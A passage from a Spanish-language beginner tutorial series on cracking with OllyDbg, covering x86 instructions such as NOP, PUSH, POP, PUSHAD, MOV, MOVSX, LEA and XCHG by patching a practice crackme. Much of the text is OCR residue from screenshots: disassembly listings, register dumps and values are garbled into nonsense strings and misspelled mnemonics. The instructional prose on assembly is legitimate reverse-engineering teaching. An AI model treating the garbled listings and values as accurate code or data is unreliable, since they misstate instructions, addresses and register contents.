Bueno con esto tenemos una idea de que es cada registro y en que caso se activa cada FLAG, con esa 
información ya podremos en la tercera parte estudiar instrucción por instrucción ya que por ahora solo 
vimos la instrucción ADD para ayudarnos a comprender cuando se activaba cada FLAG. 


Se que esta parte y la que viene son las mas indigestas de todas así que léanla con paciencia, practiquen 
con el OLLY activar los FLAGS al ejecutar nuestro ADD EAX,1 y nos vemos en la parte 3 de esta 
INTRODUCCION. 

Es muy importante que queden bien grabados todos estos conceptos básicos, recomiendo leer practicar y 
releer hasta que no haya dudas. 


Hasta la parte 4 
Ricardo Narvaja 
10 de noviembre de 2005 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 4 


INSTRUCCIONES 


Como ya venimos diciendo en las anteriores partes, la idea de esta introducción es ir aprendiendo a la vez 
que indigestándonos con la dura teoría, practicándola en OLLYDBG para ir conociendo el mismo, y de 
paso ir tomado confianza e ir mirando las posibilidades que tiene. 

Así como con los flags vimos en OLLYDBG que instrucciones los activaban, ahora veremos que ocurre 
al ejecutar cada instrucción en el mismo OLLYDBG lo cual da una idea mas cercana a la realidad y se 
hace mas llevadero. 

Veremos las instrucciones mas importantes si al mirar un listado uno encuentra alguna que no se 
definimos aquí, siempre se puede consultar un manual de ASM para ver que función cumple. 


NOP (NO OPERATION) 


Es la instrucción que al ejecutarla no hace nada ni provoca ningún cambio en registros, stack o memoria, 
por eso en ingles es NO OPERATION o sea que no hay operación alguna, y para que se usa dirán, 
muchas veces al cambiar una instrucción por otra, queda un hueco ya que la instrucción que escribimos es 
mas corta, y hay que rellenar con NOPS para que el procesador no encuentre basura y de error. 


También sirve para anular cualquier instrucción, si la reemplazo por nops el programa ejecutara los 
mismos en vez de la instrucción original y no hará nada lo que es comúnmente conocido como NOPEAR. 


Si abrimos nuevamente el crackme de cruehead. 


CALL < MP. 8KERNEL32. GetModu leHandleA> 
ESOS PTR DS: [4020CA],ERX 


Title = NULL 
PUSH _CRACKME. 004020F4 (stas: = "No need to disasm the codet” " 
FindWindowA 


Allí vemos el código original en el inicio, lo que haremos será nopear la primera instrucción PUSH 0, que 
es un comando de 2 bytes de extensión, para ello marcamos la línea con el mouse, y luego apretamos la 
barra espaciadora o bien hacemos CLICK DERECHO —ASSEMBLE. 


pe 5 e , , 
ax] en] sis sel] + 1]Jejmt[wn]c[/]É/B/r|..[s] :=)35)2] 
00401002 ES FFO40000 CALL <JMP. £KERNEL32. GetModu Back » 

Az CAa2o40066a  [|MOU DWORD PTR DS:[4020CA1,E p 

6A BB PUSH B 

6s F4zo9o000  |PUSH CRACKME.0049020F4 Copy » | disasm the codet” 
ES A6040008 4 
BECO OR EAX,EAX Binary » 


A 
cres 23209000 O a a Label y 


5 (705 64204009) MOU DWORD PTR DS:[402064],4 
. CR MOU DWORD PTR DS: [462068], C 


Allí vemos que en el mismo menú nos confirma que es lo mismo apretar la barra espaciadora, esto nos 
abrirá una ventana para escribir la instrucción que queramos. 


Assemble at 00401000 [IX] 


nopl v 


7 Fill with NOP's Cancel | 


Escribo NOP y apreto ASSEMBLE. 


Es ra YI vYY ILLAS U Lts LU > dl ad > VU AL YY U A 


EXJIEM ETA Ele +6 1] +) 1/elm/T/w)H] c] + 


NOP 
CALL <JMP. *¿KERNEL32. GetModu leHandleA> 
MOU DWORD PTR DS: [4020CA7,EAX 


mina a 


90 
a10 Es FFO40000 
a +. AS CAaz04000 


er rara 


aTial. 


Vemos que OLLY además de escribirnos un NOP, como es bastante inteligente, reconoce que el PUSH 
que había antes es un comando de DOS BYTES por eso para no desarmar el código siguiente nos agrega 
otro NOP para completar con el NOPEADO del PUSH. 


Si comparamos ambas imágenes vemos que donde estaba el PUSH O ahora hay dos NOPS que al 
ejecutarlos no hacen nada, esto lo podemos corroborar, apretando dos veces F7 hasta llegar al CALL 
siguiente, si miramos al apretar si cambia algún registro o algo en el stack, o un FLAG, vemos que todo 
esta igual , lo único que cambio fue EIP pues como sabemos apunta a la instrucción que se va a ejecutar y 
en este caso ahora es el CALL, pero no hay cambios en el resto de los registros ni stack, ni flags, ni 
memoria. 


Ahora veremos esos mismos 2 bytes que reemplazamos en el DUMP, para hallarlos allí, debemos 
buscarlos por la dirección de memoria, vemos que la misma es 401000 y 401001 


la EEN Hu al Jem) 1/9] e] 


NOP 
CALL _< JUMP. ¿KERNEL32. GetModu leHandleñ> 
MOU OWORD PTR DS: [4920CA7,EAX 


Voy a la ventana del DUMP y hago CLICK DERECHO - GOTO EXPRESSION y pongo la dirección de 
memoria a partir de la cual quiero que muestre los bytes que contiene. 


06 06 66 40 yb 
00 60 66 00 Ba 
0 60 06 00 Ba 
00 60 00 00 BB| .....o.. 
00 00 00 00 BO ...o.o.. 
00 00 00 00 0Ol .onano.. 


Backup > E 
E Search for  » É:: 
: HE 


Y Hex » 


00402073 


Por supuesto tipeo 401000 


Enter expression to follow in ... 


[401 00d y 
Cancel 


Los que vemos es 


BO Él 06 Es AZ 63 Ba 
¡AS 7C 20 40 00 Cr as 


El rojo es original puesto POR OLLY ya que cuando cambiamos bytes, OLLY nos los recuerda 
mostrandolos en color rojo, allí vemos los dos 90 que pusimos y luego E8, FF y los siguientes bytes que 
ya pertenecen a la siguiente instrucción que es un CALL. 


Podemos en OLLY quitar lo que hemos escrito y volver al código original? 
Jeje, si podemos. 


En cualquiera de los dos, sea en el DUMP o en el listado, marcamos los dos bytes que escribí. 


1 Y mevrr A Dd dl Y A A 


EXE el EFE] $0) 1 + 1/ejmtjiwnjc[7]k/B]r] 


90 nop 
ES FFoO46600 — |CALL <JMP.2KERNEL32. GetModu leHandleA> 
AS CA204006 — [MOU DWORD PTR DS: [4020CA],EAXx 


a 5A 40 PUSH B Title = NULL 
a 68 F4204000 — [PUSH _CRACKME. 004020F4 (stas: = "No need 
B Es A60400B0B FindWindowA 

ana MA PO PF 


Ahora hago CLICK DERECHO-UNDO SELECTION 


aX] Pu) v3+] $34) 3)" +)" 00 009 08) 500 500 8) 109 0 E 10 0 5 


13 
NOP 


30 | 

Es FFa40000 [CALL <JMP.¿KERNEL32. GetModu leHz. Backup » 
. A2 CA204000  |MOU DWORD PTR DS: [40206CA],EAX 
. 6A 00 PUSH A Copy » 
. 68 F4204000 [PUSH CRACKME. 004020F4 
. ES R6G40000 | CALL IMP. RUSERS2.FindilindoWA) — Binary » 
. BECA OR EAX, EAX 
ar Undo selection Alt+BkSp 
> 0705 64204000| MOU DWORD PTR DS: [402064], 4003 

C/8s es204088| MOL DWORD PTR DS: [482066], CRACK Assemble pace 


É : PRE APSACARA! MALL AMARA PTR NA: PáASAREA 


Y aquí no ha pasado nada, vuelve a aparecer el PUSH original 


6A Ba PUSH 6 

ES FFO40B0B-— [CALL <JMP.KERNELS32. GetModu leHand leA> 
AS CA204008 — |[MOU DWORD PTR DS: [4020CA],EAXx 
ES 


PUSH U 

F4204000 [PUSH CRACKME. 004020F4 
ES A60400Ba 

Beca OR EAX, EAX 


Title = NULL 
[Stass = "No need to disasm the codet” 
FindtlindowA 


TD 00 


aa 


Bueno eso es todo en cuanto a la instrucción NOP sigamos adelante. 


INSTRUCCIONES DE STACK 


Bueno habíamos dicho que el stack era como un mazo de cartas que se le agregaban o quitaban cartas por 
arriba del mismo. 


Por supuesto hay instrucciones para agregarle y quitarle cartas. 


PUSH 


La instrucción PUSH es la típica instrucción que agrega una carta o valor al stack 
Veámoslo en OLLYDBG la primera instrucción del programa original del crackme de cruehead era un 
PUSH. 


A a =.o--- AREAS 


a] + 1J2)m 108) 0 Jx]8/RJ=J5] 


Es FFO40000 — |CALL <JMP.¿KERNEL32. GetModu leHandleA> 
AS a PTR DS: [4020CA],EAX 


5n Bb Title = NULL 

63 F4204000 |PUSH CRACKNME. 004020F4 (stas: = "No need to disasm the codet” 
Es A6444BBB FindllindowA 

aARrA MR FO FOY 


En este caso es un PUSH 0, al ejecutarla lo que hará en este caso, será colocar el O en la posición superior 
del stack, sin sobrescribir lo que se encontraba antes lo cual quedara debajo. 


Veamos como esta el stack antes de ejecutar el PUSH, en mi maquina esta en esta dirección, en la de 
ustedes puede variar aunque el efecto será el mismo. 


RETURN to kernel32.7C81604F 


AE: 
F 


SEH chain 


CRACKME. <Modu leEntryPoint > 


Este es el stack en mi maquina, la dirección 12FFc4 puede variar en su máquina, ya que el stack se puede 
acomodar en otra dirección en cada caso, y el contenido inicial a veces también puede variar o sea que 
ustedes pueden tener otro valor que 7c816d4f, pero no importa al ejecutar F7, el cero pasara a la parte 
superior del stack y el resto quedara abajo, veamos apreto F7. 


phodule = NULL 
RETURN to el32./C81604F 
3S|ntdll.7C9 


End of 
SE hand 


ernel32. 


SEH chain 


316058 


DE 


0| CRACKME. <¿Modu leEntryPoint> 


Vemos que al ejecutar F7 fue realmente como si se agregara encima el cero que vemos resaltado allí, 
abajo en 12ffc4 sigue estando 7c816d4f, y no vario nada todos los mismos valores están en las mismas 
direcciones del stack. 


La única diferencia que ahora el valor superior del stack es 12ffc0 y allí esta el cero que pusimos con el 
PUSH, fue realmente como agregar una carta a un mazo, se coloco arriba y dejo el resto que estaba antes 
sin cambiar nada debajo. 


Vemos también que el puntero ESP que muestra la dirección del valor superior del stack ahora marca 
12FFCO0. 


o 


Por supuesto el comando PUSH tiene variantes no solo puedo agregar números, si hago: 


PUSH EAX, agregare el valor de EAX en lugar del cero, podemos PUSHEAR cualquier registro, numero 
etc. 


Podemos PUSHEAR también el contenido de una dirección de memoria 
PUSH [401008] 

Veamos que se debe interpretar bien la diferencia con 

PUSH 401008 

Sin corchetes 


Si hago PUSH 401008 lo que hará será colocar el número 401008 en el stack 


3] 44) X] 2 3 A MU! 


NOP 

MOU DWORD PTR DS: [4020CA7,EAX 
PUSH O 

PUSH CRACKME. 004020F4 


RACKME. 00401003 
BETURN_ to kernel32.7C81604F 
mtdll.7C: 3 


| 
[Am 167 


DOS 
Do 


FF| End of SEH chain 
2 


y 
Je o ol Ja Jo fo ol fl fo pr 


aaa aaa aa 


pur 


CRACKME. <Modu leEntryPoint > 


En cambio si fuera PUSH [401008] 


AAA AE AS CELEEEEE EEE 


FF35 03104000 E DWORD PTR DS: [461008] 
MOV DWORD PTR DS: [4026CA],ERX 


PUSH 8 Title = NULL 
63 F4204000 |PUSH CRACKME. 004020F4 [ets = "No need to disas 
Es AGO400BB | CALL <JMP.SUSERS2.FindilindowA> FindWindowA 

. BECO OR EAX, EAX 

74 01 


Los corchetes significan el contenido de la memoria en 401008 o sea que debemos ir en el DUMP a ver 
esa dirección y ver que hay alli. 


Con GOTO EXPRESSION 401008 vemos 


DE 


40 Ba A3.74 20 40 Sn SA 


£A Ef CO Mt 14D (ía (aña Mo 


Di 


¡DO4DZ0CA Ú ACKNME. £ 
Ps ME tc 
(0920738 ntdll.7C< 


FEFFFFFF 
Í SEE - BBB 


A 


Vf | > 


h 


Vemos que mando al stack el valor que leyó pero los bytes están al revés o sea nosotros vemos en el 
dump CA 20 40 00 y los puso al revés o sea 00 40 20 CA, 


Bueno esta es una propiedad del procesador, al leer o escribir contenidos de memoria siempre los bytes se 
toman al revés, y bueno quejas al inventor del procesador jeje. 


Pero la idea que debe quedar grabada es que sin corchetes el valor es simplemente un número, y con 
corchetes el valor refiere al contenido de una dirección de memoria. 


Ahora vemos que el OLLY cuando escribimos PUSH [401000] interpreto y escribió 


yA 2H] 297 Rs] $5] 2] Ns) HBO MEN ES DS O IE VES E E LO E 
Ta DWORD PTR DS: [461068] 
MOU DWORD PTR DS: [4020CA7,EAX 
PUSH a 


PUSH _CRACKME. 004020F4 


NULL 
"No need t 


PUSH DWORD PTR DS:[401008] 


Porque ocurrió eso 


Es que si uno no aclara el OLLY interpreta que uno quiere leer los 4 bytes de esa posición de memoria, 
eso es DWORD leer los 4 bytes completos ya veremos las otras variantes en otras instrucciones. 


POP 


La instrucción POP es la inversa de PUSH lo que hace es quitar la primera carta o el primera valor del 
stack y lo coloca en la posición que indicamos a continuación del POP, por ejemplo, 


POP EAX tomara el primer valor del stack y lo quitara moviéndolo a EAX, y será como si quitamos una 
carta, ya que el valor que estaba debajo quedara como primero. 


Vemos arranquemos de nuevo el crackme de cruehead y en el inicio esta 


ex] eju] pis] $0] 1] +] 1/Ejm]T]wjH]c] //k/B]R]... s] 


E] CALL _<JMP. ¿KERNELS32. GetModu leHandleA> 
MOU DWORD PTR DS: [4020CA7,ERX ML 


PUSH B 
PUSH CRACKME. 004020F4 E = "No need to disasm the codet” 
CALL _<JMP. USER32.FindtlindowA> FindtlindowA 

OR EAX, EAX 

JE_SHORT CRACKME. 664015610 


MOU DWORD PTR DS: [402064], 4003 
HOY PUORD ETA DS: [482368]; CRACKME.UndPo 


m2) 


Cambiemos dicha instrucción por POP EAX, marcamos la primera línea, apretamos la barra espaciadora 
y tipeamos. 


POP Ex 


[4 Fill with NOP's 


ex] »ju] vil 


NOP 
CALL <JMP. ¿KERNEL32. GetModu leHandleA> 
MOU DWORD PTR DS: [4020CA7,EAXx 


PUSH 6 
PUSH CRACKME. 004020F4 


31 


90 
Es FFO400Bn 
AS CA2040009 


6A 60 
63 F4204000 


RETURN t 


Intdll.7C 


Y ESP apunta a 12FFc4 que es el valor superior del stack. 


¿ OBL2FFED 

7C91EB94 ntdll. 
FFO460B 
DOL12FFC4 


EE 
ESI FFFFFFFF 
EDI 70920738 ntdll. 


EIP 00401000 CRACKN 


Y vemos que EAX esta a cero antes de ejecutar la línea en mi caso. 


Apreto F7 


(C920738|ntdll.7C920738 


54d Ep 

31061 

0012 

—abl2 
an12 
Bai2 End of SEH chain 
aBi2 í E handler 
an12 al 7? erne 132. 70816058 
ani2 Cl a 
aB12FFFO| O 
aB12FFF4| 
BB12FFFS| Ml CRACKME. <Modu leEntryPoint > 
aB12FFFC 


Vemos que en el stack desapareció nuestra primera carta, ahora el primer lugar lo ocupa la que entes 
estaba 2da y ESP apunta a 12ffc8. 


registers 
| EAX 7CS1604F kernel: 
ECX BB12FFEO 

EDX 7C91EB94 ntdll.k 
7FFD4000 
BB12FFCS 


F 

Yc920738 ntdiW.r 
EIP 60461001 CRACIgE 
CO ES 0023 32bit £ 


Pi CS 6MB1B 32bit £ 
A O SS 0023 Sebir € 


Pero donde fue a parar nuestra carta se perdió?, noo como era un POP EAX fue a parar a EAX vemos en 
la imagen que EAX ahora vale 7c816d4f en mi caso y en el suyo tendrá el valor que antes estaba superior 
en el stack en vuestra maquina. 


Lo mismo si hubiera sido POP ECX el valor superior hubiera ido a ECX o al registro que eligiéramos. 
Bueno ya vimos las instrucciones que ponen o quitan una carta al stack ahora tenemos. 
PUSHAD 


PUSHAD guarda el contenido de los registros en la pila en un orden determinado. Así pues, pushad 
equivale a: push FAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI. 


Veamos si es cierto lo que nos dice nuestro amigo CAOS REPTANTE en su tute de asm, jeje. 


Abrimos de nuevo el crackme de cruehead y ya sabemos que apretamos la barra para escribir y alli 
tipeamos PUSHAD. 


Assemble at 00401000 (IX! 


[PUSHAD y] 
IV Fill with NOP's Cancel 


my 


RN_to kerne 
|. 7C920738 


7C920738| ntd 
FFFFFFFF 
7FFDSG00 
8054A938 
6O12FFC8S 
848C4A50 
FEFFFFFF 
7C8399F3 
7C816058 


ntdl 


End of SEH chain 
SE handler 
kerne132. 70816058 


00401000 
0000000B 


CRACKME. <Modu leEntryPoint> 


DOBDBBDS 
ECx BB12FFEBO 
EDx 7C91EB94 ntdll 
EBX 7FFDOSO06 


Ba12FFC4 
EBP OB12FFFO 
ESI FFFFFFFF 
EDI 70920738 ntdll 


EIP 006461008 CRACK 


nor TOO MATA TT ia 


an12FFA4 
Alooi2rFAS 


920738 
FEFFFFFF 
DO12FFFO 
DO12FFC4 
7FFOSOO6 
7C91EB94 
DOl2FFEO 
(12151:]:]:]:] 
70920738 
FEFFFFFF 
7FFDSG0B 
8054938 
0B12FFCS 


mETU 
ntdll.7C920738 


End of SEH chain 
SE handler 
kerne132.7C816058 


CRACKME. <¿Modu leEntryPoint > 
BB12FFFC 


Vemos que hizo un PUSH a cada uno de los registros, el primero que agrego esta arriba de 12ffc4 que era 
el valor superior del stack antes de ejecutar, ahora hay un cero arriba que corresponde a PUSH EAX, 
luego hizo PUSH ECX y mando el 12ffb0 que estaba en ECX, luego envió consecutivamente los valores 
de los registros uno a uno al stack hasta el ultimo que fue PUSH EDI. 


POPAD 


La inversa de PUSHAD es POPAD en este caso toma los valores del stack y los manda a los registros 
como si fuera un POP a cada uno. Así popad equivale a: pop EDI, ESL EBP, ESP, EBX, EDX, ECX, 
EAX. 


Allí mismo donde quedo del ejemplo anterior escribamos un POPAD 


Assemble at 00401001 
[POPAD y| 


IV Fill with NOP's Cancel | 


a A A O 


— Pic) 10 
eS 


Es FFo40000 
AS CA204000 
5A Un 
63 F4204000 
FR DARA 


2) 50 En] BEA EE 
PUSHAD 


POPAD 
CALL <JMP.8KERNEL32. GetModu leHandleA> 
deere PTR DS: [4020CA],EAXx 


PUSH CRACKME. B04020F4 
POLI OZ. IMP 2LISER22 FindAilindmD > 


) 
Laa 


Allí esta para ejecutarse el POPAD los registros están guardados en el stack y al apretar F7 vuelven del 
stack a sus lugares originales. 


ETE SS = SB EEE +$63:(63 


DO 
1 
3 00 


End of SEH chain 
h an dl 


JT 00 € 


y 


Dor 
PS 
vr A J 
a] 
— 
m 


Dal: 
Dal: 


Tel 


ñ 
y € 
( 


9| CRACKME. <Modu leEntryPoint > 


La dupla PUSHAD-POPAD se usa mucho cuando se quiere guardar el estado de registros en un punto, 
realizar muchas operaciones que cambian registros y el stack, y luego con POPAD restaurar los registros 
y el stack al estado original. 


Existen algunas variantes como 


PUSHA equivale a: push AX, CX, DX, BX, SP, BP, SL DI. 
POPA equivale a: pop DI, SI, BP, SP, BX, DX, CX, AX (los valores recuperados correspondientes a ESP 
y SP, no se colocan en los registros sino que se descartan). 


En el caso de PUSHA y POPA es similar a sus hermanas PUSHAD y POPAD salvo se que utilizan en 
programas de 16 bits lo cual no nos interesa ya que OLLYDBG es un debugger para programas de 32 
bits. 


INSTRUCCIONES PARA MOVER DATOS 
MOV 


Esta instrucción es lo que comúnmente llamaríamos MOVER, mueve el segundo operando al primero por 
ejemplo. 


MOV EAX, EBX 


Lo que hace es mover el valor de EBX a EAX, miremos en OLLY y nuestro bendito crackme de 
cruehead. 


| o A Ad NN O RA AR dde! 
[c] File View Debug Plugins Options Window Help 


m4dx] e Jl] vis] $00) el] > ojejmit]wjn]: 


2BC3 MOU EAX, EBx 
Es FFO4006B8 — |CALL <JMP.2KERNEL32. GetModu leHandleA> 
AS CA2040606 — [MOU DWORD PTR DS: [4620CA],EAXx 


6A 40 PUSH B 
AR Fapasads [PUSH PRACKMF. ARARAFA 


Y ?COTEB94 
A TEFDOTOBB 


En mi maquina EAX es 0 y ECX es 7c91eb94, como son valores iniciales en la suya pueden ser 
diferentes pero al apretar F7 lo importante es que el valor de EBX lo moverá a EAX, veamos apretemos 
E7, 


E y 


AX "FFD7B00 


Viola esta claro no? 
MOV tiene variantes por ejemplo 
MOV AL, CL 


Esto movería el valor de CL a AL veamos reinicio OLLYDBG y escribo 


Es FFo4a00a [CALL _<JMP.2KERNEL32. GetModu leHandlef> 
20 cacaspno MOU DWORD PTR DS: [4020CA],EAXx 


PUSH O 
68 F4204000 — [PUSH CRACKME. 004020F4 
0 SA Ens Ea; «SUSERS2.FindWindowA> 


EAX 
JE SHORT CRACKME. 00491610 
RETN 


ARA 14 


ntdl 


: BOL2FFCA 
> GOL2FFFO 


da 


¡ADD AA 


FA0RNDZO Mm ammmmmmmmio 


Ef 


19: : 


Recordamos lo que vimos ya que AL son las ultimas dos cifras de EAX y CL las dos ultimas cifras de 
ECX, ejecutemos con F7 


ca 


Sn 


D12FFFO 
FECEEEEE 
7C 


m ammmmmamamja 


DOGO 


Vemos que sin tocar el resto de EAX y ECX el BO se copio a AL, o sea las ultimas dos cifras de FAX. 


También podemos mover a algún registro el contenido de una posición de memoria o al revés. 


$— [Bb] fic IA cal A [ne JE 0 E JOE ad Y E Y Y Y y 


2, DWORD PTR DS: [405008] 


MOU EA 
NOP 
NOP 

MOU DWORD PTR DS: [4026CA7,ERX 
PUSH B 

PUSH FRAFCKMF. ARÍAZAFS 


5A 60 
AR F42A4ARA 


En esta caso moveremos el contenido de 405000 a EAX y como dice DWORD serán los cuatro bytes lo 
que moveremos. 

Esta instrucción puede dar error si la dirección de memoria no existe, lo cual podemos ver fácilmente en 
el OLLY. 


Vamos al DUMP y hacemos GOTO EXPRESSION 405000 


Pomo 
Doxorosa 
=0FOKOXa 
¡B00yB+a 
30001060 
DOcoroDa 


12P3U313 
a3i3A3. 4 
24.4$444 


LARA Ana 


Vemos que existe y su contenido es 00 10 00 00 o sea al moverlo a EAX, dado que trabajamos con el 
contenido de una dirección de memoria se moverá al revés o sea 00 00 10 00 apretemos F7 a ver que pasa 


BB12F 
FFFFF 


Allí esta el 1000 que leyó de dicha dirección de memoria, ahora si quisiera escribir un valor en dicha 


dirección seria 


MOV _ DWORD PTR DS:[400500] EAX 


Reinicio el OLLYDBG y la escribo 


73 DWORD PTR DS: (4605067, ERX 


NOP 
MOU DWORD PTR DS: [4026CA7,EAX 


a 4343 2) 73 


PLabrlfealy” IEAIPO! 
an4 a ABS d 


En 405000 veo en el DUMP 


US: LUM9UMSu00 =D 


DON: 


De £ 


Al apretar F7 oops 


Command 1? cl y| | 


Me da una excepción y eso es porque la sección donde vamos a escribir no tiene permiso de escritura, lo 


cual impide cambiar bytes ejecutando instrucciones. 


Bueno ya veremos como cambiar permisos de secciones mas adelante lo importante es que ya conocen la 
instrucción. 


Obviamente como podemos mover 4 bytes especificando la palabra DWORD si usamos WORD moverá 
2 y si usamos BYTE moverá 1. 


Veamos 


MOV AX,WORD PTR DS:[405008] 


En este caso moverá dos bytes del contenido de 405000 a AX, en este caso no podemos escribir EAX ya 
que como son solo 2 bytes los que movemos debemos usar el registro de 16 bits AX, 


Veamos que hay en el DUMP en 405008 


Enter expression to follow in ... 


[405008] Ñ v 


Cancel 


h ESP 0B12FFC 
EBP 001 SFEFON 
ESI FFFFFFFF 


EDI 7C920738 nt« 


EIP 00401006 CRE 


” CAmES 4423 22 


Allí esta en AX, al revés como corresponde a leer de contenidos de memoria, el resto de EAX no ha sido 
cambiado solo lo correspondiente a AX. 


Lo mismo seria si usáramos BYTE 
MOV AL, BYTE PTR DS:[405008] 


En este caso movería a AL el ultimo byte solamente o sea el 08. 


EDI 7C928738 ntdll. 
EIP 00401065 CRACKM 
bit 


E 
c 
D: 


INDDO 
Y tr (E ta 
DOC 


MOVSX (Move with Sign-Extension) 


Copia el contenido del segundo operando, que puede ser un registro o una posición de memoria, en el 
primero (de doble longitud que el segundo), rellenándose los bits sobrantes por la izquierda con el valor 
del bit más significativo del segundo operando. Aquí tenemos un par de ejemplos: 


La definición la sacamos del tute de CAOS ahora veamos un ejemplo en OLLYDBG para aclarar y 
usemos a nuestro amigo CRUEHEAD. 


[AAA HO] 2 E 65] 21 ==] MN 
MOUSX EAX, BX 


N 
MA AMARA PTR NS: Trár?arol FOsw 


90 
02 Prozadana 


Como aun no se los dije porque soy muy malo y quería que siempre buscaran a mano, los valores de los 
operandos jeeje, OLLYDBG tiene una ventana de aclaraciones que esta justo debajo de el listado y arriba 
del DUMP. 


rusan oc 


PUSH 0B4 
PUSH BCFOGBO 
PUSH_CRACKNME. 004B20E7 


. OM OC 

. 68 B4000000 
. 63 BOB 
._63 


a] 
mm 
datada 
nm 

de 

de 

Ol 


mí 
DO 
DO 

Y 


DO 
DO 
DO 
DOS 
DOE 
DOS 
DO) 


Ed 
EY 
Ed 
EY 
DI 


Allí vemos que la ventana de aclaraciones nos muestra el valor de los operándoos de nuestra instrucción 
en mi caso BX vale FOOO eso lo puedo corroborar en los registros 


TT] 
0012FFB0 
?CALEB94 gral 


FODa 


ul 


ESP BB 
> Ba12FFFO 
FFFFFFFF 
7C920738 


' 10401000 


15) sa 


E 

RT B 

AD a 

20d a [ 
a] BB3B 3 
TO 56606 NULL 
DO 

NA lastFrr FRRA 


Y allí mismo veo que FAX vale cero, así que siempre el OLLYDBG nos ayuda a interpretar los 
operandos de la instrucción a ejecutar. (que malo soy jeje pero quise que fijen el concepto de donde 
buscar cada cosa antes de la comodidad jeje) 


Al apretar F7 


ntd 


EIP 00401003 CRA 


Vemos que se copia el BX que era FO00 a AX y que se rellena con FFFF ya que el numero es un negativo 
de 16 bits , si hubiera sido BX 1234 entonces quedaría EAX=00001234 ya que rellena con ceros al ser 
BX positivo. 


El tema de los positivos y negativos de 16 bits es similar a 32 bites se divide por la mitad el espacio 0000 
a FFFF 


de 0000 hasta 7FFF son positivos y de 7FFF a FFFF son negativos vemos que si modificamos BX a 
7FFF y ponemos EAX a cero y volvemos a ejecutar la instrucción 


ada 


ntdll.KiF: 


Copia 7FFF a AX pero rellena con ceros ya que 7FFF es positivo si repetimos pero con BX=8000 que es 
negativo, 


DOBOBBaO 
ECX BO12FFBO 
EDx 7C91EB94 ntdl 
EBx 'BOBBSaBa 
ESP BO12FFC4 
EBP BO12FFFO 


FFFFFFFF 

EDI 70920738 ntdl 
EIP 00401003 CRACH 
NA FS ARZ 22hi1 


[EMB 7 


Ejecuto nuevamente con F7 y 


do o 


JNE 


ntdl 
CRACt 


Copia BX a AX y rellena con FFFF ya que 8000 es negativo 


MOVZX (Move with Zero-Extend) 


Igual a movsx, pero en este caso, los espacios sobrantes se rellenan siempre con ceros o sea no depende 
de si el segundo operando es positivo o no como en el caso anterior no haremos ejemplos porque es 
sencillo darse cuenta que todos los ejemplos anteriores darían en EAX 0000...... y a continuación los 
bytes de BX que se copiaron a AX. 


LEA (Load Effective Address) 


Similar a la instrucción mov, pero el primer operando es un registro de uso general y el segundo una 
dirección de memoria. Esta instrucción es útil sobre todo cuando esta dirección de memoria responde a un 


cálculo previo. 


Esto nos dice nuestro amigo CAOS y significa que en este caso por ejemplo reinicio OLLY. 


EEE Aa] vie] EL: al EE L/Ejm]T)w]m/c]4[k] 


150 TN PTR DS: [4620CA],EAX e : Ñ 
tle = 


Aquí es el único caso en que hay corchetes que no se mueve el contenido de la dirección de memoria que 
se calcula dentro del corchete si no la dirección en si. 


En mi caso ECX vale 12FFb0 


151551517275] 
ECX 'BB12FFBD 
— EDX 7C91EB94 n 
EBX 7FFOBBOO 
ESP BO12FFC4 
EBP BO12FFFO 
ESI FFFFFFFF 
EDI 7C920738 


n 
EIP 00401008 C 
Cc O ES 0923 3 


Y lo que hace LEA es sumarle 38 en este ejemplo y mover ECX mas 38 que es igual a 12ffe8 a EAX 


En la ventana de las aclaraciones ya muestra ambos operándoos 


o64u10B?|l. 68 E?204000 PL 


Stack address=4M12FFES 
EAX=00009000a 


Muestra que un operando es 12FFe8 que proviene de sumar ECX+38 y EAX vale cero antes de operar. 


Al apretar F7 


RH TCS1EBIS 
EBx 7FFOBOGDO 


ESP 0912 >FFC4 
EBP OB12FFFO 
ESI FERFEFEF 
EDI 70920738 ntdl 


EI e0401093 CRACI 


Dicha dirección se mueve a EAX, hay que tener cuidado porque los corchetes nos llevan a pensar que 
deberíamos mover el contenido de la dirección 12ffe8 que debemos buscar en el dump como en el caso de 
la instrucción MOV, pero LEA solo mueve la dirección al primer operando no su contenido. 


XCHG (Exchange Register/Memory with Register) 


Esta instrucción intercambia los contenidos de los dos operandos. 
En este caso intercambia los valores si escribimos 
XCHG FAX,ECX 


El valor de EAX pasara a ECX y viceversa comprobémoslo en OLLY 


Ln] 44) X] EE 2%] $4) 9] + LE 


ACHG_EAX, ECX 


NOP 
CALL <JMP. 8KERNELS2. GetModi 
Ao PTR DS: [4026CA],E 


30 

ES FFO40005 
AS Caz04000 
6A 60 


EP BOIZFFFO 
1 ERRRPEEE 


70920738 ntdll. 70s 
EIP 60401061 CRACKME. E 
Ca bit BF 
P 1 bit BF 
AD bit BF 
co! bit BF 
su 32bit ?FF 
T ía Hit 


También se puede usar para intercambiar con una posición de memoria siempre que tenga permiso de 
escritura dicha sección 


5 Y Mevrr bd | ds na Y A A 


US 


NOP 
MOU DWORD PTR DS: [4020CA],EAX 
PUSH 9 

FUSH CRACKME-994029F4 _.. 


Nos pasa lo mismo que cuando quisimos hacer MOV a dicha dirección al no tener permiso de escritura 
nos genera una excepción. 


Bueno creo que como primera parte de las instrucciones ya tienen para divertirse y practicar, creo que los 
ejemplos si los van haciendo mientras leen aclaran bastante la cosa, en la siguiente parte seguiremos con 
mas instrucciones hasta terminar con las mas importantes y tratar de terminar esto que es lo mas duro. 


Hasta la parte 5 
Ricardo Narvaja 
13 de noviembre de 2005 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 5 


INSTRUCCIONES MATEMATICAS 
INC Y DEC 


Estas instrucciones incrementan o decrementan respectivamente el operando, sumándole uno si es INC o 
restándole uno en el caso de DEC. 


Veamos en el OLLY, como siempre abrimos el OLLYDBG y el crackme de cruehead y en la primera 
línea escribimos 


ISEPESAAEAAPSAAEAEAAAPESAEAPEAREAAEAS Y y y yy y | 
40 INC EAX 


90 NOP 
Es FFO40000 
AS 


OS 
ba4016 


CALL <JMP. ¿¿KERNELS2. GetModu leHandleA> 
MOV DWORD PTR DS: [4026CA7,ERX 


PUSH O 
PUSH FRAFKME. AAGAZAFA 


DOS 
de pod pd 


Tit 


Fla 


5A 4b 
AR FIÍP2AGARA 


s BBBBBBOO 


7CITEBN ntdl 
2% PEFDEGOO 
SP BO12FFC4 
> OBLZFFFO 
SI FFFFFFFF 


PA ARA mm 


— MEDR PCOTEBOS ntdll. 
a 
a12 FFC4 


ntdll. 
00401081 CRACK 


bit 
bit 


| DTD AAA 


del 


DD mm mmmmm 
mm DD 


DUO: 


